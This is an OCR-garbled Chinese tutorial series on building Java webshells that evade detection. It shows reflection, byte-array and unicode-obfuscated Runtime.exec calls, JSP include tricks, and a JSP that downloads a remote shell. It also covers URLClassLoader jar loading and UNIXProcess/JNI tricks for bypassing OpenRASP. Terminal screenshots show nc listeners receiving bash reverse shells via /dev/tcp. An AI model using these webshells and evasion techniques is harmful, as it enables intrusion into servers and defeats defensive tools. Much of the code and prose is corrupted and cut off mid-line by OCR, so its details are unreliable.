式 ， 这 是 java webshell 第 二 篇 系列 ， 这 是 关于 webshell 的 bypass 的 上 篇 ， 注 意 : 请 勿 使 用 
讨 的 技术 构造 恶意 webshell 非法 入 侵 他 人 网 站 。 警 察 匀 徐 银 手 铸 专 治 各 种 调皮 小 朋友 。 


关键 字 bypass 系列 


在 攻防 对 抗 早期 ， 针 对 java webshell 的 检测 ， 一 些 比较 呆 萌 的 厂商 的 安全 设备 (现在 某 些 也 是 
及 应 用 主要 是 针对 关键 字 的 检测 。 


比如 : 存在 系统 调用 的 命令 执行 水 数 、 存 在 系统 调用 的 文件 操作 函数 等 的 检测 Runtime.exec( 
方法 等 。 此 章节 主要 从 关键 字 上 进行 探讨 如 何 构建 自己 的 webshell 进行 bypass。 


第 一 种 : java 反射 bypass 
针对 关键 字 、 关 进 函数 的 检测 ， 那 java 中 可 利用 高 级 特性 ， 反 射 来 进行 达到 bypass 关键 字 (上 
文章 里 预 留 了 反射 的 作业 ) 

首先 ， 我 们 来 看 个 反射 的 例子 : 


比如 通过 反射 加 载 命令 执行 的 类 ， 加 载 完成 后 进行 传 入 我 们 需要 的 命令 ， 即 可 进行 绕 过 exec() 这 
的 正则 关键 字 


我 们 先 来 看 看 基础 的 反射 执行 命令 ， 通 过 Class.forName 加 载 Runtime 类 、 获 取 到 runtime 对 象 ， 
着 进行 invoke 执 行 exec 方 法 ， 这 是 一 个 入 门 版 的 基础 反射 bypass 执 行 命令 。 
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iava. lang.reflect.Method; 


‘aya.io. InputStream; 

































pa ram cmd 


P { 


th exit code e 


_ Runtime r 
E System.out.println(new java.io.BufferedReader(new java.io.InputStrean 
catch (Exception e){ 

~ System.out .printin(e); 


ava. lang.reflect.*; 
va.util.Scanner; 


反射 命令 执行 的 bypass 操作 


slass ReflectionExec { 


简单 入 门 的 Runtime .exec( ) 的 反射 执行 


static void execByrelections(String cmd){ 


(Runtime )Class. forName("java.lang.Runtime").getMethod("ge 


public class ReflectionExec { 


s emd 


public static void execByrelections(String cmd)i 
try 


Runtime r = (Runtime)Class. forName (" java. Long. Ru 


ime"). getMethod( 


ise", new java. lang. Class (1 (}).anvoke( 


Systen.out.printlninew java, io. Bof feredheader (new java. io. InputStreanheader( r. exec(cmá) getInputStream())) . readLine()) ; 


)catch (Exception e)( 
Systen.cut.printinte); 


} 

public static void (String 10 

(es Runtine.exec() MMAG+hyte FER, REKSAMBHE 
public static void (String cmd) 
public static void (String 


public static void main(String{] args) { 


Ref 


Vines/jdk1.6.0 101. jdk/Co 





ReflectionExec.execByrelect ions 
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aseqmeg sp pwe 


m 


null, new! 


的 进 阶 版 ， 通 过 结合 利用 byte 字 节 码 + 反射 的 
何 痕迹 的 反射 回 显 命令 执行 马 


前 面 我 们 学 习 了 基础 的 反射 Runtime 类 进行 执行 exec 命令 ， 那 如 何 做 到 毫 无 runtime，exec 
字 呢 ， 答 案 是 使 用 byte 字 节 码 + 反射 的 方式 进行 bypass。 对 关键 字 使 用 byte HGRA, ^ 
执行 ， 几 乎 不 会 留 下 任何 的 关键 字 。 


/** 这 是 一 个 成 熟 的 命令 执行 反射 nxebshell 应 有 的 次 势 


执行 结果 : 
简单 的 执行 ls -al /tmp/ 


Run 


b 4Run =£G:TODO 9€ Terminal 
Build completed successtully in 4 s 227 ms (moments ago} 


hm od 


si 


* Runtime.exec() 利用 反射 +byte 字 节 码 ， 完 全 无 任何 关键 字 痕 迹 的 反射 回 显 命 令 执行 
* @param cmd 
of 

public static void execByrelectionsByte(String cmd){ 









try{ 
String runtime = new String(new byte[] { 106, 97, 118, 97, 46, 
Class<?> c = Class. forName(runtime) ; 
Method m1 = c.getMethod(new String(new byte[] { 103, 101, 116, 
Method m2 = c.getMethod(new String(new byte[] { 101, 120, 101, 
Object obj2 = m2.invoke(mi.invoke(null, new Object[] {}), new 0 
Method m = obj2.getClass().getMethod(new String(new byte[] { 163, 
m.setAccessible(true); 
Scanner s - new Scanner((InputStream) m.invoke(obj2, new Object[ 
System.out.println( s.hasNext() ? s.next() : ""); 

jcatch (Exception e){ 


J 


wed 
out 
src 
main 
java 
org public class ReflectionExec { 
apache.jsp 
BasicShelt 
FileShell sor cmd 
RelectionShell 
© ReflectionExec public static void (String cmd){...} 
© LoadShell public static void (String of 
m LoadShell$JniClass.class 
oœ LoadShell.class , 
reflection 
weitdbird.httputil cmd 
A DS public static void execByrelectionsByte(String cmd)[...) 
tes! 
package .json 
target public static void (String 0» 
web 
WEB-INF public static void main(Stringl] args) { 
se Visp Ref lectionExec.execByrelectionsByte( Us -al /tmp/"); 
om 24Sp i 
lectionkxec 
slanka len 
ReflectionExec 
‘Lidrary/Jave/JavaVirtuatmachines / Jaki 8.8 18L.jdk/Contents/Home/bin/java 
total 136 
drwxrwxrwt 15 root wheel 480 Nov 12 13:14 . 
drwxr-xr-x — 6 root wheel 192 Dec 18 2018 ,. 
-rW-rw-rw-à 1 weirdbird807 wheel $ Nov 11 06:32 .keystone install lock 
Se 1 root wheel € Nov 11 06:32 AlTestl.err 
TIWefenpee 3 root wheel € Nov 11 06:32 AlTestl.out 
2Dp-r- 1 root wheel 9343 Nov 12 13:14 SurgeHelper.log 
stwxrwxrwx 1 weirdbird@07 wheel @ Nov 11 89:22 SurgeHelper. socket 
-rwr-rw-rw- 1 root wheel 47570 Nov 12 13:13 adobegc. log 
SrW-(w-rw- 1 root wheel 9 Nov 11 06:32 Clamd3. socket EUR 


=O: Messages Pi Java Emerprise T, Application Servers 
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e, exec 等 关 1 j 
一 
Em. "MR 行 执行 bash 反弹 操作 
~ x " 
9t 
yl $ 
String funtine = new String(new byte[] ( 186, 97, , 108, 97, 110, 183, 46, 82, 117, 110, 116, 105, 109, 101 )); B 
Classe?» c = Class. forWame( runtime); : 
fn 4i Method ml = c.getMethod(new String(new bytel] ( 7 15, 82, 137, 110 9, 101 })); 
ER 令 执行 马 Method m2 = c.getMethod(new Stringinew bytel] { 1 P 9 H, String: ' i n 
Object obj2 = m2, invoke(m1. invoke( null, new object} {}),emd); 8 i : 
Method m = obj2.getClass().getMethod(new String(new bytel] { 102, 101, 116, 73, ne, 12, 117, 116, 83, 116, 114, 101, 97, H 
m.setAccessible(true); H 
Scanner s = new Scanner ( (InputStream) m.invoke(obj2, new Object[] ())).useDelimiter( S4"); t i 
System.out.println( s.hasNext() ? s.next() : ""); 
)«atch (Exception e){ 
e.printStackTrace(; 
} 
— weirdbird007@weirdbird007: Amp — ssh weirdbird607@172.16.194,133 — 101x10 
q997:/tmp$ nc -lvnp 9989 
@) (family @, port 9989) 
97, 46, 
172.16.194.1 64368 received! 
ntrol in this shell :ception, NoSuchMethodException, ClassNotFoundExcept ion % 
,2$ bash-3.2$ bash-3.2$ © a 
1, 116, 82 
1 sainStringl] args) € 
0, 101, 99 : e yan 
ReflectionExe 4 
i Syste 
2r new Ob Bi riecttontxec. Biacnyretectionsbyee( bash -c (echo, L2J)pbi9iYXNoICljlCdlYXNoYClpIDAmL2Rldi90Y3AvMYcyi JEZL J ESNCAXMzZMvOTKAOSAWPAY x Jwen} | (ba 
e[] { 163 
w Object[] 
tt 





















ents /Home/bin/ java 


rr 





tne Enni W^ Kellnern Cni 


节 基 础 篇 的 话 ， 那 么 这 里 简单 处 理 了 下 ， 可 以 看 见 反射 exec 方 法 的 上 海 使 用 了 数组 传 
我 们 执行 的 命令 里 涉及 特殊 字符 的 就 不 需要 进行 base 64 ， 可 直接 执行 ， 留 下 个 可 改进 
“和 "-c" 作业 ， 如 果 看 懂 了 代码 ， 同 学 们 ， 应 该 知道 如 何 过 滤 这 2 个 关键 字 。 


ReflectionExec + H C m mw 316 


= 


& ReflectionTestjava © WoUntil java € StingUntil java € WebS$hellBasic java € Runtimejava 


T Y Y. Match Case Words Regex 了 
o 


‘ing runtime = new String(new hyte(] { 186, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117, 110, 116, 105, 109, 101 p); 


a $«?» c = Class. forName(runtime); 
sod ml = c.getMethod(new String(new byte[] ( 103, 101, 116, 82, 117, 110, 116, 105, 109, 101 H); 
d m2 = c.getMethod(new String(new bytel] { 101, 120, 101, 99 }), Stringll. class); 
t tempsml.invoke( ^ null, new Object(] {}); 

0bj2 = m2. invoke(temp, new Object[]4 new String[]("/bin/ba e",cmnd))); rcii 
d m = obj2.getClass().getMethodlnew String(new bytel] { 103, 116, 73, 1310, 112, TON 116, 83, 116, 114, 101, 97, 109 })); 
cessible(true); 
ner s = new Scanner((InputStream) m.invoke(obj2, new Object[] {})).useDelimiter(“\\A"); A ^ 
out.println( s.hasNext() ? s.next() : ""); 
Exception ent 


pentester = weirdbird007 (weirdbird007: /tmp ~ ssh weirdbird007@172.16.194.133 ~ 134 x10 


4 T4097: /tnps nC -lvnp 9989 
] (family ð, port 9989) 





:16.194,1 49642 received! 
in this shell 
Bash-3,2§ bash-3.2$ sias 503 (weirdblrd007) gid=20(staff) groups-20(staff),581(access, bpf), 12 (everyone) ,61(localacco tFoundException { 


ii reu ectionsbytes ^ (String cmd) {...} 
tring args) { 


CS. oxecByri 





Vhin/java ... 
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第 三 种 方法 : Java 后 门 -unicode 编 码 


Java 代 码 默认 可 以 直接 全 是 unicode 编 码 ， 那 么 我 们 在 构造 jsp 脚 本 的 时 候 ， 只 要 把 java 关 
进行 转 成 unicdoe 编 码 即 可 bypass， 我 们 看 下 面 这 段 代 码 ， 关 键 函 数 全 部 编码 了 ， 但 是 仍 扯 
(To 






public static void execByUnicode(String cmd) { 
BufferedReader bufrIn = null; 
BufferedReader bufrError = null; 
StringBuilder result = new StringBuilder(); 
Process process=null; 
| Runtime run = Nu0052Nu0075Nu006eNu9074Nu9069Nu906dNu09065Nu002e^ug 
| | try f 
| | process = \u0072\u0075\u006e\u002e\u0065\u0078\u0065\U0063 (new 
process.waitFor(); 
bufrin = new BufferedReader (new InputStreamReader (process .ge 
bufrError = new BufferedReader (new InputStreamReader (process.g 
String line; 
while ((line = bufrIn.readLine()) != null) { 
result .append(line).append('\n'‘); 
| } 
| while ((line = bufrError.readLine()) != null) { 
result.append(line).append('\n'); 
} 
System.out.println(result.toString()); 
) catch (Exception e) ( 
e.printStackTrace(); 


Il | } 
JN // 销毁 子 进程 
finally{ 
// 关 闭 打开 的 流 
IoUntil.closeStream(bufrIn); 
IoUntil.closeStream(bufrError); 
if (process !- null) ( 
process.destroy(); 
了 
k 
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public static void execByUnicode(String cmd) 





















BufferedReader bufrIn = null; > ^ 
Bufferedeesder bufrfrror e mil; — ” r 
StringBuilder result = new StringBuilder{); 
Process process=null; 
ae s iti52y.00 75 ud0Ge ude A ces Autocad Né0020V:005 0865x200 74V 40052 00075 Vu0066Vu007 4yu006 9 up0631u0065y90020V00029; 
try 
process = Vu9072y,8075y 06e u002eVu0065N 007 Vu0065 46063 (new String[](" /bin/bash","-c",cud)); BURRELI 
process.waitFor(); 
bufrin = new BufferedReader(new InputStreamReader(process.getInputStream(), "UrE-8")); 
但 是 仍 IE bufrError = new BufferedReader(new InputStreamReader (process.getErrorStream(), "wrE-87)); 
E A 执 String line; 
while ((line = bufrIn.readLine()) t= null) 4 
result.append(line).append( n'); 
» 
while (line = bufr£rror.readLine()) ;= null) ( 
result. append{ line) ,append( n); 
System.out.println{ result. toString()); 
} catch (Exception e) { 
e.printStackTrace(); 
finally! ..) 
) 
" public static void main(String[] args) ( 
Ref lectiontxec.execByUnicodel ls -al /tmp/^); 
E 
PRefiectionExec ` execByUnicccet 
rtualMachines/jdk1. 8.9. 181. jdk/Contmnts /home/bin/java 
wheel — 480 Nov 12 14:09 || 
wheel 192 Dec 10 2018 .. 
wheel 0 Nov 11 06:32 .keystone install lock 
wheel 9 Nov 11 06:32 AlTestl.err 
40063 ( new S wheel 6 Nov 11 06:32 AlTesti.out 
wheel 9343 Nov 12 13:14 SurgeHelper. log 
FARR mm om^ - no" 
OCess, 
lrocess,ge 
g org apache isp RelectionShell © ReflectionExec RefiectionExec +» c} € 
© NatveMethodAccesscrimpiciass © testjava C loUmtijava ym3jsp č StigUmiljava © WehSheliBasic ava 
t vy * Match Case Words Regex 
reas siesat puau cAccUyuracuue atiam umuri 
BufferedReader bufrIn = null; 
BufferedReader bufrError = null; 
StringBuilder result = new StringBuilder(); 
Process process=null; 
Runtime = anra CE EA 0850087 45 $9653. NMOS TYPSESY L-CS? 4002570007 500660 87 4 UAHA AGA MEAS E DLA 00825; 





new Es hel S ig Lae i Coe ream(), “ar 
bufr£rror = new Buf feredReader(new InputSt reamReader (process. get£rrorStrean(), 


String Line; 
result.append(line).append( Wn ); 


result.append(line).append( Wn ); 


System.out.println(result.toString()); 
} catch (Exception e) ( 
e.príntStackTrace() ; 


Ft Wess 
nattyt .} 


Static void main(String{] args) { 
JubaSQ i 10879 v6973 cot 74: coc 4 
















while ((line = bufrIn.readLine()) != null) { 


} 
while ((Line = bufrError.readtine()) := null) { 





{new StringI]{"/bin/besh™,“~c",cmd}); 





VrF-87)); 

SE pentester — weirdbirGO07&weirdbird007: Amp — ssh werdbird0076172.16.194.133 — 96x16 
:/ts9$ nc —lvnp 9989 

Listening on [8.8.0.0] (family 8, port 9989) 


Connection from 172.16.194.1 60423 received: 
bash: no job control in this shell 
bash-3.2$ bash-3.2$ bash-3.25 bash-3.2$ bash-3.2$ bash-3.2$ bash-3.25 bash-3.2s bash-3.2s Š 


- Reflectiontxec.execByUnicode| -3 "bash -i ski dov/tcp/ 172. 16.194, 133/8989 $561"); 






K 


? execByunicoget] 


Whines / jk. $.9 191. jdk/Contents /Hone/bin/java 


pass 结束 ， 我 们 下 篇 再 见 。 
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e 


seb t 


要 
1 
asedele0 gio pev e 分 


mr 


java webshell 从 入 门 到 入 狱 系列 3- 攻 防 对 抗 之 
Bypass- 中 篇 


前 言 


小 葵花 妈妈 课堂 开课 啦 ， 欢 迎 各 位 大 小 朋友 入 座 ， 上 篇 我 们 介绍 了 java 中 常见 的 webshell 中 针对 
键 函 数 、 关 键 方法 等 关键 字 的 绕 过 方式 ， 这 是 java webshell 第 三 篇 系列 ， 这 是 关于 webshell 的 
bypass 的 中 篇 ， 这 节 ， 我 们 来 探讨 针对 webshell 中 针对 openrasp (开源 应 用 运行 时 自我 保护 解 
方案 ) 、 以 及 一 些 其 他 方式 加 载 执行 webshell 的 绕 过 方式 技巧 。 


注意 ; 请 勿 使 用 本 文 探讨 的 技术 构造 恶意 webshell 非法 入 侵 他 人 网 站 。 警 察 罚 季 银 手 铸 专 治 各 
皮 小 朋友 。 


其 他 姿势 载 入 webshell 的 技巧 tip 
include 本 地 引入 


在 jsp 中 ， 也 有 像 php 那 样本 地 include 的 方式 进行 加 载 ，include 脚本 里 不 留 危险 代码 ， 危 险 代码 


以 放 在 其 他 jsp 里 或 者 png 图 片 里 。 当然 这 种 方式 也 是 需要 落地 到 硬盘 本 地 ， 不 是 太 推荐 , 就 像 鸡 
肋 ， 食 之 无 味 弃 之 可 惜 。 


方法 1 jsp 标签 






<jsp:directive.include file="include.png"/> 


方法 2 include 指令 


<%@ include file="include.png"%> 


方法 3 include 动作 标签 


<jsp:include page="include.jsp"/> 


方法 4 jstl 标签 


<%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %> 
<c:import urlz"/include.jsp" context="/"></c:import> 
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bshell 的 EN eoc a DOM/sheliby posinclude jsptquest-inconti 
E P | | 


| Windows IP ?? 


2222? EthernetO: 


AI. 

治 - 1) | 222227 DNS 72... 
222? IPV6 2?....... .: feBO::c9f:e101:9799:94a3%19 
IPv4 ?? << 192,168,31,221 


BEE oe a! E EOS OO OA) 
Drusus. 192.168.31.1 
=] 





19992 222770) 


Neb 随 机 后 门 (远程 下 载 文 件 ) 


要 用 于 ， 当 web 应 用 上 层 有 waf 时 ， 上 传 各 种 后 门 都 失败 ， 那 就 上 传 一 个 可 以 远程 下 载 的 
一 个 正常 的 远程 文件 下 载 功 能 目前 大 多 数 的 waf 均 不 会 特别 的 去 进行 留意 ， 那 么 访问 该 jsp 
务 器 下 载 恶 意 shell 到 应 用 目录 ， 通 过 文件 下 载 流 落地 到 web 应 用 目录 ， 实 现 bypass 
应 用 服务 器 装 了 安全 狗 、edr 之 类 的 产品 ， 那 么 远程 的 恶意 shell 针对 edr、 安 全 狗 本 身 再 


359 


<%@ page language-"java" import-"java.io.*,java.net.*,java.util.*" 
«961 
String getConnection(String url) { 
String result="",line=""; 
ERYS 
URL realUrl = new URL(url); 
URLConnection connection = realUrl.openConnection(); 
connection. setConnectTimeout (15000) ; 
connection. setReadTimeout (15000) ; 
connection.connect(); 
BufferedReader in = new BufferedReader (new InputStreamReader (connec 
while ((line = in.readLine()) != null) { 
result += line; 
} 
} catch (Exception e) { 
e.printStackTrace(); 






} 
return result; 
} 
void writeShell(String url,String path){ 
try{ 
RandomAccessFile rf = new RandomAccessFile(path, "rw"); 
rf.write(new String(getConnection(url)).getBytes()); 
rf.close(); 
Jcatch(Exception e){ 
e.printStackTrace(); 


} 
String getRandomString(int length) { 
String base = "abcdefghijklmnopqrstuvwxyz0123456789"; 
Random random = new Random(); 
StringBuffer sb = new StringBuffer(); 
for (int i = 0; a < Length; a+), T 
int number = random.nextInt(base.length()); 
sb.append(base.charAt(number ) ) ; 
} 
return sb.toString(); 
l 
String getRequestFile(HttpServletRequest request) { 
return "/WEB-INF/classes/"+getRandomString(new Random().nextInt(10)+1)+"-J 
} 
%> 
<% 
String f = getRequestFile(request),p = request .getSession().getServletcontextl 
writeShell(request.getParameter("ur1"),p); 
%> 
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受 件 即 可 远程 加 载 后 门 
— * 


"um 7. ane 


geEncodin 


(C) > Program Files > Apache Software Foundation > Tomcat 8.5 . webapps > shellbypass > WEB-INF > classes 





AURLCIassLoader 动 态 加载 jar 包 webshell 


0ader ， 远 程 加 载 jar 的 方式 ， 我 以 前 分 享 过 的 一 篇 文章 ( 免 杀 分 离 篇 ) 里 提 过 ， 利 用 
EURLCIlassLoader ， 假 如 应 用 服务 器 可 以 出 网 ， 那 么 利用 urlclassloader 就 可 以 实现 加 载 远 
总 jar 文件 ， 达 到 webshell 执行 


nection. 


lass.forName("Load", true, new java.net.URLClassLoader(new java.net.URL[]{new 


b 


EC ^ 


jar 里， 打包 放 编译 好 的 菜刀 class 文件 即 可 


u 27.0.0.1:8080/shellbypass/shell FromRemoteJar. jsp?u-http: //127.0.0.1:8080/remote/1. jar 023 viera 
























目录 (8), Sr ft (6) X4 Bit = 站 5 
16:04 — 4096 R m 
Program Files 3 4 shied. =] 
Apache Software Foundation s Vel - Bi 
E Gali 15:04 81 
= bin LICENSE 53.50 580 ; 
a conf RUOTA coe 
e lib ES] i px - 
aG logs HOTICE 53 50 R 
e rasp-java H rasp 40:57 
© tenp are e 63 
a webapps j tcm n i 
© work RELEASE-NOTES 53:50 
temp 19.48 OSE 
cat 53:50 
® Uninstall 2019-07-05 04.54.08 80526 R 
T webapps ( 12:50:31 
} 21.17:4 


y+1)+" J 


p (开源 应 用 运行 时 自我 保护 ) Bypass 


说 完了 各 种 关键 字 绕 过 、 各 种 方式 进行 载 和 webshell ， 那 我 们 继续 讨论 关于 现在 很 火 的 
A Jbypass tips 
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| 首先 : 什么 是 open rasp "mo 


co oo quit * 


OpenRASP 官方 文档 


Gartner 在 2014 年 提出 了 运行 时 应 用 自我 保护 “技术 的 概念 ， 即 “对 应 用 服务 的 保护 ， 不 应 该 依赖 于 外 部 系统 ; 应 用 应 
该 具备 自我 保护 的 能 力 . OpenRASP 是 该 技术 的 开源 实现 ， 它 改变 了 防火 墙 依赖 请 求 特征 来 拦截 攻击 的 模式 。 
对 于 注入 类 的 漏洞 ， 我 们 可 以 识别 用 户 输入 的 部 分 ， 并 检查 程序 逻辑 是 否 被 修改 。 由 于 不 依赖 请 求 特征 ， 我 
们 每 条 报警 都 是 成 功 的 攻击 。 


II 目前 ，OpenRASP 已 经 集成 在 多 个 商业 主机 安全 软件 里 ， 也 有 大 量 客户 将 它 部 署 至 生产 环境 。 如 果 你 在 使 用 
原理 
II 在 Java 技术 栈 下 ，RASP 引擎 以 javaagent 的 形式 实现 ， 并 运行 在 JVM 之 上 。 在 应 用 服务 器 启动 


ill 的 时 候 ，RASP 引擎 借助 JVM 自身 提供 的 instrumentation 技术 ， 通 过 替换 字 节 码 的 方式 对 关键 类 
方法 进行 挂钩 : 


结合 上 下 文 、 参 数 
iR. xs 
— reas 











边界 防火 墙 部 着 了 OpenRASP 的 应 用 服务 器 














III openrasp 原理 : 利用 instrumentation (jdk1.5 以 后 新 增 ) , Lijavaagent 的 形式 进行 hook 关键 国 
数 ， 进 行 监控 相关 恶意 行为 ， 比 如 执行 命令 的 的 jvm 底层 实现 java.lang.unixProcess 和 
java.lang.processimpl 
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MIF SA Java.io.FileDutputstreami) 


java.io.FileOutputStream(String name, boolean append) 





文件 重 命名 java.io.File.renameTo() 
ms 文件 遍历 java.io.File.list() 
ish SSRF org.apache.commons.httpclient.URI.parseUriReference() 
我 org.apache.http.client.methods.HttpRequestBase.setURI() 
com.squareup.okhttp3.HttpUrl.parse(String) 
使 用 
com.squareup.okhttp.HttpUrl.parse(String) 
sun.net.www.protocol.http.HttpURLConnection.connect() 
反 序 列 化 java.io.ObjectinputStream.resolveClass 
» 命令 执行 java.lang.UNIXProcess.<init> 
java.lang.Processlmpl.«init» 
OGNL 表达 式 执行 ognl.OgniParser.topLevelExpression() 
XXE com.sun.org.apache.xerces.internal.util.XMLResourceldentifierlmpl() 
org.apache.xerces.util.XMLResourceldentifierlmplisetValues() 
JSTL import org.apache.taglibs.standard.tag.common.core.ImportSupport.targetUrl() 
DubboRPC com.alibaba.dubbo.rpc.filter.ContextFilter.invoke() 
com.alibaba.dubbo.rpc.filter.GenericFilter.invoke() 
SQL 注入 com.mysql.jdbc.Statementlmpl 
lopenrasp hook 点 逃逸 
ok 关键 区 


-byte 直接 加 载 java.lang.UNIXProcess 进行 命令 执行 
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<%@ page 
<%@ page 
<%@ page 
<%@ page 


<%! 
byte 


Inpu 


contentType="text/html;charset=UTF-8" language-"java" %> 
import="java.io.*" %> 
import="java.lang.reflect.Constructor" %> 
import="java.lang.reflect.Method" %> 


[] tocstring(String s) { 
if (s == null) { 
return null; 


byte[] bytes = s.getBytes(); 

byte[] result = new byte[bytes.length + 1]; 
System.arraycopy(bytes, 0, result, 0, bytes.length); 
result[result.length - 1] = (byte) 0; 

return result; 





tStream start(String[] strs) throws Exception { 
Class clazz = Class.forName(new String(new byte[]{106, 97, 118, 97, 4 


Constructor<?> constructor = clazz.getDeclaredConstructors()[0]; 
constructor.setAccessible(true); 


assert strs !- null && strs.length » 0; 


// Convert arguments to a contiguous block; it's easier to do 
// memory management in Java than in C. 
byte[1[] args = new byte[strs.length - 1][]; 


int size - args.length; // For added NUL bytes 
for (int i = 0; i « args.length; itt) { 
args[i] = strs[i + 1].getBytes(); 
size += args[i].length; 


byte[] argBlock = new byte[size]; 
int ak = 0; 


for (byte[] arg : args) { 
System.arraycopy(arg, 0, argBlock, i, arg.length); 
i += arg.length + 1; 
// No need to write NUL bytes explicitly 


int[] envc 
int[] std fds 


new int[1]; 
new int[]{-1, -1, -1}; 
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FileInputStream f0 = null; 
FileOutputStream f1 = null; : z 
FileOutputStream f2 = null; 


// In theory, close() can throw IOException 
// (although it is rather unlikely to happen here) 
try { 


if (fO != null) f0.close(); 
) finally ( 
try ( 
if (fi != null) fi.close(); 
) finally ( 


if (f2 != null) f2.close(); 


Object object - constructor.newInstance( 
toCString(strs[0]), argBlock, args.length, 
null, envc[0], null, std fds, false 


Ey 


- Method inMethod = object.getClass().getDeclaredMethod("getInputStream"); 
~” inMethod.setAccessible(true); 


= return (InputStream) inMethod.invoke(object); 


if (charset == null) { 
charset = "UTF-8"; 


} 

ByteArrayOutputStream out = new ByteArrayOutputStream(); 
int a =0; 

byte[] b = new byte[1024]; 

while ((a = in.read(b)) != -1) ( 


out.write(b, 0, a); 


return new String(out.toByteArray()); 
p catch (IOException e) { 
: throw e; 
.3 finally { 
En (in '= null) 
in.close(); 
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String str = request.getParameter("str"); 


if (str != null) ( 
InputStream in 


i 


start(str.split("NNst")); 
inputStreamToString(in, "UTF-8"); 


String result 
out.println("«pre»"); 
out.printlin(result); 
out.printin("«/pre»"); 
out.flush(); 
out.close(); 





rd007 4096 Oct 29 08:52 . 
4096 
18914 
1486 


irdbirdQQ7 « 

weirdbird007 weirdbird007 
weirdbird007 weirdbird007 
weirdbird007 weirdbird007 
1 weirdbird007 weirdbird007 
weirdbird007 weirdbird007 
weirdbird0o 
















dige 
digest 








weirdbird007 
irdbird007 





1 weitdbird007 weirdbird007 


/ In theory, ) ow IOException 
// {although it is rather unlikely to happen nere) 


JNI ， 直 接 调 c 的 接口 ， 直 接 进行 绕 过 hook 点 (在 webshell 的 分 离 免 杀 里 详细 讲解 过 原理 及 方法 ; 
这 里 就 不 细 说 里 ) 
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j RE d Aio) UM) Br $ s » § 
dac. Us z = P * & ~ 


E 





age contentType=“text/ntml;charset=UTF-£" language-"java" à» 


ciass JniCiass 





//System.icad 
f/System.icad 
System.ioad 





nt authority\system 


8 a a aoe 二 


法 已 被 官方 加 入 hook， 已 失效 (未 升级 的 openrasp ZhRAM Al bypass). 
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x 百度 安全 实验 室 
首先 是 WeirdBird 发 起 的 JNI 防 护 讨论 。 
在 webshell 中 的 分 离 免 杀 实践 -java 篇 一 文中 ， 他 
提出 了 两 种 免 杀 思路 : 
o 通过 URLClassLoader 远程 加 载 菜刀 后 门 ， 
关键 代码 不 落地 
o 通过 JNI 实 现 自 定 义 Java 方 法 ， 通 过 对 popen 


包装 实现 命令 执行 后 门 


对 于 方案 1， 由 于 是 内 存 加 载 ， 对 基于 恶意 payload 
特征 的 查 杀 工具 比较 有 效 ; 如 果 EDR 强 行 查 杀 
URLClassLoader， 则 会 有 误 报 风险 。 而 对 于 
OpenRASP 来 讲 ， 由 于 攻击 者 最 终 还 是 要 调用 
java.lang.ProcessBuilder， 所 以 无 法 绕 过 
OpenRASP 目 前 已 有 的 命令 执行 检测 点 。 


对 于 方案 2， 作 者 放弃 使 用 
java.lang.ProcessBuilder， 改 用 自 定义 的 JNI 函 数 
实现 命令 执行 ， 因 此 绕 过 了 OpenRASP 的 检测 点 。 
另外 ， 作 者 建议 将 JNI 类 库 放 到 远程 共享 服务 器 ， 
使 用 UNC 路 径 (如 \\8.8.8.8\bds.dll) 加 载 ， 来 进 
一 步 减少 在 目标 主机 上 的 痕迹 。 


Es: 
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三 篇 内 容 关 于 webshell 载 入 方式 、 以 及 rasp 针 对 应 用 本 身 的 bypass 交流 探讨 。 我 们 下 
As ii ë » 
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java webshell 从 入 门 到 入 狱 系列 4- 攻 防 对 抗 之 
Bypass- 下 篇 


前 言 


小 葵花 妈妈 课堂 开课 啦 ， 欢 迎 各 位 大 小 朋友 入 座 ， 上 篇 我 们 介绍 了 java 中 常见 的 webshell pH 
openrasp 《开源 应 用 运行 时 自我 保护 解决 方案 ) 、 以 及 利用 一 些 其 他 方式 加 载 执 行 webshel 的 
方式 技巧 ， 这 是 java webshell 第 四 篇 系列 ， 这 是 关于 webshell 的 bypass 的 下 篇 ， 流 量 层 来 讨 
于 如 何 进 行 bypass 操作 。 


注意 : 请 勿 使 用 本 文 探讨 的 技术 构造 恶意 webshell ANSARI. SERIES PES 
皮 小 朋友 。 


webshell bypasss 流量 篇 


说 到 从 流量 层 来 绕 过 各 种 防护 设备 waf、ids、 安 全 狗 之 类 的 ， 那 么 就 不 得 不 提 今 年 因为 打 护 网 岂 
名 的 冰 蝎 ， 导 臻 遭遇 各 种 分 析 、 各 种 查 杀 、 加 黑 。 


各 家 厂商 早期 针对 流量 层 查 杀 webshell 的 原理 


比如 拿 著名 的 中 国 菜刀 来 说 ， 从 request 和 response 流量 就 能 看 到 关键 性 的 明显 特征 ， 关 键 的 人 
采用 了 base64 编 码 ， 但 是 payload 中 扔 有 多 个 明显 的 特征 ，POST 请 求 中 有 
Convert.FromBase64String 关 键 字 ， 有 Zz1 和 Zz2 参 数 ，z1 参 数值 为 4 个 字符 ，z2 参 数值 为 base64 纺 
字符 ， 于 是 各 家 安全 厂商 针对 包 里 有 这 种 特征 的 就 直接 阻 断 ， 但 是 针对 这 种 简单 的 编码 并 不 是 长 
2M 
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E 
DIG 


PALER, TABOO 
发 送 编译 之 后 的 字 节 码 (java 编译 后 的 class 文 件 ) 进行 交互 ; 
有 AES 加 密 流量 ，post 至 服务 端 ; 


eJ i 服务 器 


Get 请 求 
BZ EET 


shell 中 针对 
'ebshellBS £s 
量 层 来 讨论 美 








SRE A Session 
J 打 护 网 出 í RE 7 a ——————— 密 祖 返回 客户 应 


关键 的 代码 


Post 请 来 
ayloed ebsites NG SEEPaxnload 


| 


ee 23,77 Payload 


base644nt 
并 不 是 长 4 


折 二 进 制 class 文 件 : 
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做 法 十 分 高 明 ， 为 了 能 够 解析 来 自 客户 端的 class 文件 ，Java 并 没有 提供 直接 解析 class 
接口 ， 间 接 的 利用 classloader 的 defineClass 方 法 进行 恶意 加 载 ， 可 以 将 byte[ 直 接 转 换 


" dr 
| ReflectionExec java © ClassLoaderjava ^ €. processimpljava C foUntiljava © ^ € StingUntiljava € Web 


| define 人 Match Case Words Regex 


+ @throws NoClassDefFoundError 


ifanamac/stin i 








throws  IndexOutOfBoundsException 


{Fal Ft tt»len«/tt 


throws SecurityException 


mp 5 20e to aad 





@ ý protected final Class<?> HefineClass(String name, byte[l b, int off, int len, 


ProtectionDomain protectionDomain) 
throws ClassFormatError ‘ 


T 
| protectionDomain = preDefineClass(name, protectionDomain); 
WI String source = defineClassSourceLocation(protectionDomain) ; 
| Class«?» c = defineClassl(name, b, off, len, protectionDomain, source); 
postDefineClass(c, protectionDomain); 
return c; 
5 





